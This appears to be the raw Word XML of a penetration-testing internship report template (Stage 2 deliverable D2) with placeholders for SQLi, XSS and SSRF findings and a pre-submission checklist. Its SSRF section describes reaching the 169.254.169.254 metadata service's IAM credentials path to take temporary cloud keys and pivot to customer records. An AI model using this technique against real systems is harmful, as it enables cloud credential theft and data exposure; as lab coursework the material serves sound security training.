      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[CWE-918 — Server-Side Request Forgery. State it.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The payload I sent (verbatim):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Your exact SSRF payload — the metadata-service URL you reached, e.g. the link-local 169.254.169.254 IAM credentials path your lab uses. Paste exactly what the server fetched on your behalf.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The verbatim response confirming it worked:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste the verbatim response — the IAM credential blob the metadata service returned, or the verifier's success output / your flag. This is server-checked; it cannot be faked.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">First failed attempt (required for SSRF):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste your first attempt that returned the wrong thing.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why it failed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — e.g. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">metadata-but-not-iam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: I hit the metadata root and got instance metadata, but not the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">…/iam/security-credentials/&lt;role&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path that returns the temporary keys.”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What this link gave the attacker (the pivot — and the end of the chain):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — temporary cloud IAM credentials, i.e. read access to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">customer_pii</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">index / 84,210 records. This is where web access becomes account access.]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Before you write the closing page, confirm for EVERY link:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Component + CWE named.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exact payload in a code block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verbatim server/lab response (flag or verifier output) in a code block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLi and SSRF each include a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">first failed attempt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ one-sentence reason.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reflected vs stored XSS are in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sections and explicitly distinguished.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each link ends with the one-sentence pivot to the next link.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losing-the-chain-as-one-weapon"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">── Closing — the chain as one weapon ──</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[~80 words. Step back: state how the four independently-mild-sounding bugs compose into a catastrophic chain (auth bypass → client-trust break → persistence → cloud takeover). Name the single link that, if it had been closed, would have broken the chain earliest — and defend the pick. This shows the grader you understand chaining, the thing that separates a pen-tester from a scanner.]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re-submission-checklist-for-d2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pre-submission checklist for D2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First line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Stage 2 · D2 · &lt;Full Name&gt; · &lt;Intern Code&gt;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Four sections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in order: SQLi → reflected XSS → stored XSS → SSRF.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Every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">link has component, CWE, exact payload, and verbatim server response.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SQLi and SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">each include the first-failed-attempt response + one-sentence reason.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Reflected and stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are separate and explicitly told apart.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Root cause</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stated as cause, not symptom (at least for SQLi).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Every payload is one you actually ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— the verifier checks SQLi/SSRF on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No response is paraphrased; all are verbatim.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[BRACKETED]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rP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italic guidance line</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">removed.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Page count is 3–5.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Saved as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(DOCX accepted).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File named</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">STAGE2_D2_EXPLOIT_&lt;Surname&gt;.pdf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">UBI Programme Team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2026-06-16T19:10:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-16T19:10:17Z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